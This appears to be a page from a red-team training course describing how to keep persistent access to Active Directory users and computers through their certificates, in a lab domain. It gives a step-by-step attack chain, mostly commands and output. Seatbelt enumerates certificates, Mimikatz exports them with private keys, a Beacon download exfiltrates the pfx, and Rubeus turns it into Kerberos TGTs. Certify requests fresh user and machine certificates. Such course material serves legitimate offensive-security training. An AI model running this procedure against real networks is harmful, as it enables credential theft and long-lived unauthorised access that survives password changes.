User & Computer Persistence

Certificates can also be useful for maintaining persistent access to both users and computers, because they tend to have a longer shelf-life compared to passwords. For example, User certificates are valid for an entire year by default, regardless of password changes.

CA Name             : dc-2.dev.cyberbotic.io\sub-ca
Template Name       : User
Schema Version      : 1
Validity Period     : 1 year

\

Certificates only become invalid if they're revoked by the CA (or expire). This also does not rely on any vulnerable templates. We can extract certificates that have already been issued, or just request new ones.

\

User Persistence

User certificates that have already been issued can be found in the user's Personal Certificate store.

\

\

If we have a Beacon running on their machine, we can enumerate their certificates with Seatbelt.

beacon> getuid
[*] You are DEV\nlamb

beacon> run hostname
wkstn-1

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe Certificates

  StoreLocation      : CurrentUser
  Issuer             : CN=sub-ca, DC=dev, DC=cyberbotic, DC=io
  Subject            : E=nlamb@cyberbotic.io, CN=Nina Lamb, CN=Users, DC=dev, DC=cyberbotic, DC=io
  ValidDate          : 9/7/2022 11:44:35 AM
  ExpiryDate         : 9/7/2023 11:44:35 AM
  HasPrivateKey      : True
  KeyExportable      : True
  Thumbprint         : 43FA3C3AE4E1212A3F888937745C2E2F55BAC1B5
  Template           : User
  EnhancedKeyUsages  :
       Encrypting File System
       Secure Email
       Client Authentication     [!] Certificate is used for client authentication!

Always ensure the certificate is used for client authentication.

\

Certificates can be exported with Mimikatz using crypto::certificates (although it drops them to disk).

beacon> mimikatz crypto::certificates /export

    Public export  : OK - 'CURRENT_USER_My_0_Nina Lamb.der'
    Private export : OK - 'CURRENT_USER_My_0_Nina Lamb.pfx'

beacon> download CURRENT_USER_My_0_Nina Lamb.pfx
[*] started download of C:\Users\nlamb\CURRENT_USER_My_0_Nina Lamb.pfx (3454 bytes)
[*] download of CURRENT_USER_My_0_Nina Lamb.pfx is complete

Go to View > Downloads to sync files from Cobalt Strike to your local machine.

\

Base64 encode the pfx file.

ubuntu@DESKTOP-3BSK7NO ~> cat /mnt/c/Users/Attacker/Desktop/CURRENT_USER_My_0_Nina\ Lamb.pfx | base64 -w 0

\

Then use it with Rubeus to obtain a TGT. The export password will be mimikatz.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIINeg[...]IH0A== /password:mimikatz /nowrap

[*] Using PKINIT with etype rc4_hmac and subject: E=nlamb@cyberbotic.io, CN=Nina Lamb, CN=Users, DC=dev, DC=cyberbotic, DC=io 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\nlamb'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

    doIGQj[...]5pbw==

  ServiceName              :  krbtgt/dev.cyberbotic.io
  ServiceRealm             :  DEV.CYBERBOTIC.IO
  UserName                 :  nlamb
  UserRealm                :  DEV.CYBERBOTIC.IO
  StartTime                :  9/7/2022 12:28:51 PM
  EndTime                  :  9/7/2022 10:28:51 PM
  RenewTill                :  9/14/2022 12:28:51 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  Cptkd+BVLZ8+NS11BQQ6Zg==
  ASREP (key)              :  79C05DC0CC7909DF6448F1B24FAFBD71

OPSEC You may notice that this will request RC4 tickets by default. You can force the use of AES256 by including the /enctype:aes256 parameter.

\

If the user does not have a certificate in their store, we can just request one with Certify. \

beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:User

\

\

Computer Persistence

The same can be applied to computer accounts, but we must elevate to extract those certificates.

\

\

beacon> mimikatz !crypto::certificates /systemstore:local_machine /export

    Public export  : OK - 'local_machine_My_0_wkstn-1.dev.cyberbotic.io.der'
    Private export : OK - 'local_machine_My_0_wkstn-1.dev.cyberbotic.io.pfx'

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:WKSTN-1$ /enctype:aes256 /certificate:MIINCA[...]IH0A== /password:mimikatz /nowrap

[*] Action: Ask TGT

[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=wkstn-1.dev.cyberbotic.io 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\WKSTN-1$'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

    doIGYD[...]5pbw==

  ServiceName              :  krbtgt/dev.cyberbotic.io
  ServiceRealm             :  DEV.CYBERBOTIC.IO
  UserName                 :  WKSTN-1$
  UserRealm                :  DEV.CYBERBOTIC.IO
  StartTime                :  9/7/2022 12:06:02 PM
  EndTime                  :  9/7/2022 10:06:02 PM
  RenewTill                :  9/14/2022 12:06:02 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  6DV6vQB5lRoCz84qmRqt0X6UdIzzdQiX+y0IwwDrHlc=
  ASREP (key)              :  C1B715AF5F9B5468EB5FA8ADDA0E02EE2D7548F439DEA5A5D9B4F7DFA6482BDF

\

If requesting a machine certificate with Certify, the /machine parameter is required to auto-elevate to SYSTEM and assume the identity of the computer account. \

beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:Machine /machine